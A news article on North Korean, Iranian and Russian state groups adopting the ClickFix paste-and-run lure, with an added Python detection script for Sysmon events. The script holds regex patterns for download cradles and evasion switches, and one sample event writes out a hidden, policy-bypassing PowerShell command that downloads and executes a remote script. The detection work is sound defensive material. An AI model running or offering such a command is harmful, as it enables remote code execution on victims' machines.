State-sponsored cyber groups are flocking to the ‘ClickFix’ social engineering technique

State-sponsored hackers from North Korea, Iran, and Russia are exploiting the ‘ClickFix’ social engineering technique for the first time – and to great success.
Popular for some time with cyber crime groups, ClickFix is a social engineering practice that uses dialog boxes with instructions to copy, paste, and run malicious commands on the target’s machine.
The technique was first seen in early March last year, employed by initial access broker TA571 and the ClearFake cluster – but it soon spread far more widely.
According to researchers at Proofpoint, over a three-month period from the end of last year through the beginning of 2025, North Korea’s TA427, Iran’s TA450, and Russia’s UNK_RemoteRogue and TA422 have all been making use of it.
“This creative technique not only employs fake error messages as the problem, but also an authoritative alert and instructions supposedly coming from the operating system as a solution,” said Proofpoint.
Rather than revolutionizing their campaigns, the technique is replacing the installation and execution stages in existing infection chains. While it’s currently limited to a few state-sponsored groups, Proofpoint said it expects the attack method to become more widely tested or adopted by threat actors.
North Korea’s TA427 was first spotted using ClickFix at the beginning of this year, Proofpoint noted. The group targeted individuals in a handful of think tanks, masquerading as a Japanese diplomat and offering a meeting with the Japanese ambassador to the US, Shigeo Yamada.
Iran’s TA450, meanwhile, used an attacker-controlled email address – support@microsoftonlines[.]com – to send an English-language phish to targets at more than 39 organizations in the Middle East.
They deployed the ClickFix technique by persuading the target to first run PowerShell with administrator privileges, then copy and run a command contained in the email body. Doing this installed remote monitoring software, allowing the group to conduct espionage and exfiltrate data from the target’s machine.
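The infection chain described above leaves a recognisable trace in endpoint telemetry: an interactive shell (PowerShell, cmd, mshta) spawned from explorer.exe, often elevated, whose command line carries a download-and-execute cradle and evasion switches. The following is an added detection example written for this article; it is not Proofpoint's code or part of the original report. Event fields are modelled on Sysmon Event ID 1 (Image, ParentImage, CommandLine, IntegrityLevel), the sample events and the placeholder domain example.invalid are constructed, and the indicator weights and the alert threshold are assumptions to tune against your own baseline.

```python
"""Score process-creation events for ClickFix-style execution: a shell
launched from explorer.exe (Run dialog / pasted command), possibly elevated,
with a download-and-execute cradle on its command line.

Field names follow Sysmon Event ID 1; the events below are constructed for
this example and do not come from any real incident.
"""
import re
from dataclasses import dataclass

# Shells a victim is typically told to open and paste into.
INTERACTIVE_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# A parent of explorer.exe means a human launched it (Win+R, Start menu),
# not a script, service or scheduled task.
USER_LAUNCH_PARENTS = {"explorer.exe"}

# (pattern, label, weight): weights are assumptions, tune to your baseline.
INDICATORS = [
    (re.compile(r"(?i)\b(invoke-webrequest|iwr|invoke-restmethod|irm|"
                r"downloadstring|start-bitstransfer|curl|certutil)\b"),
     "download cradle", 2),
    (re.compile(r"(?i)\b(invoke-expression|iex)\b"), "in-memory execution", 2),
    (re.compile(r"(?i)(^|\s)-(enc|encodedcommand|ec|e)\s"), "encoded command", 2),
    (re.compile(r"(?i)(^|\s)-w(indowstyle)?\s+hidden\b"), "hidden window", 1),
    (re.compile(r"(?i)(^|\s)-(nop|noprofile)\b"), "profile bypass", 1),
    (re.compile(r"(?i)-(ep|executionpolicy)\s+bypass\b"), "execution policy bypass", 1),
]


@dataclass
class Finding:
    score: int
    reasons: list


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def assess(event: dict) -> Finding:
    """Return a score and the reasons behind it for one process-creation event."""
    image = basename(event.get("Image", ""))
    if image not in INTERACTIVE_SHELLS:
        return Finding(0, [])
    reasons, score = [], 0
    if basename(event.get("ParentImage", "")) in USER_LAUNCH_PARENTS:
        reasons.append("shell launched from explorer.exe (Run dialog / pasted command)")
        score += 2
    if event.get("IntegrityLevel", "").lower() in {"high", "system"}:
        reasons.append("elevated (run as administrator)")
        score += 1
    cmd = event.get("CommandLine", "")
    for pattern, label, weight in INDICATORS:
        if pattern.search(cmd):
            reasons.append(label)
            score += weight
    return Finding(score, reasons)


def triage(events, threshold: int = 4):
    """Events at or above the threshold, highest score first: (id, score, reasons)."""
    hits = [(e["RecordId"], f.score, f.reasons)
            for e in events if (f := assess(e)).score >= threshold]
    return sorted(hits, key=lambda h: h[1], reverse=True)


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"RecordId": "evt-1", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "Medium",
     "CommandLine": "powershell.exe"},  # user simply opened a console
    {"RecordId": "evt-2", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "High",
     "CommandLine": "powershell -w hidden -nop -ep bypass -c "
                    "\"iex (iwr 'http://example.invalid/fix.ps1')\""},  # pasted ClickFix-style command
    {"RecordId": "evt-3", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "IntegrityLevel": "System",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},  # scheduled task
    {"RecordId": "evt-4", "Image": r"C:\Program Files\Browser\browser.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "Medium",
     "CommandLine": "browser.exe"},  # not a shell at all
]

if __name__ == "__main__":
    for record_id, score, reasons in triage(SAMPLE_EVENTS):
        print(f"{record_id}: score {score}: {'; '.join(reasons)}")
```

Only evt-2 crosses the threshold: the explorer.exe parent and high integrity level each add a little, but the cradle, in-memory execution and evasion switches are what push it over. The benign console (evt-1) and the scheduled backup script (evt-3) stay well below it, which is the point of scoring several weak signals together rather than alerting on any single switch.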
ClickFix abuse expected to surge
UNK_RemoteRogue has only used ClickFix once, researchers said. Notably, none of the aforementioned groups showed repeated use of the technique.
The security firm first hypothesized that this might be because it represented a trial period, or that the groups found the technique less successful than others for machine compromise.
With TA427 returning to ClickFix with a slightly varied infection chain in April, researchers now believe that the group is developing how it uses the ClickFix technique in its operations, and that more sightings are likely in the coming months.
One noteworthy finding from the Proofpoint research is that Chinese state-sponsored groups haven’t jumped on the bandwagon as of yet. This, researchers said, could change in the coming months.
“Given the technique’s trajectory around the world, there is a conspicuous absence in the use of ClickFix by a Chinese state-sponsored actor in Proofpoint investigations,” said the firm.
“However, this is likely due to visibility, and there is a high probability that a China-nexus group has also experimented with ClickFix, given its appearance across many actors’ campaigns in a short period of time.”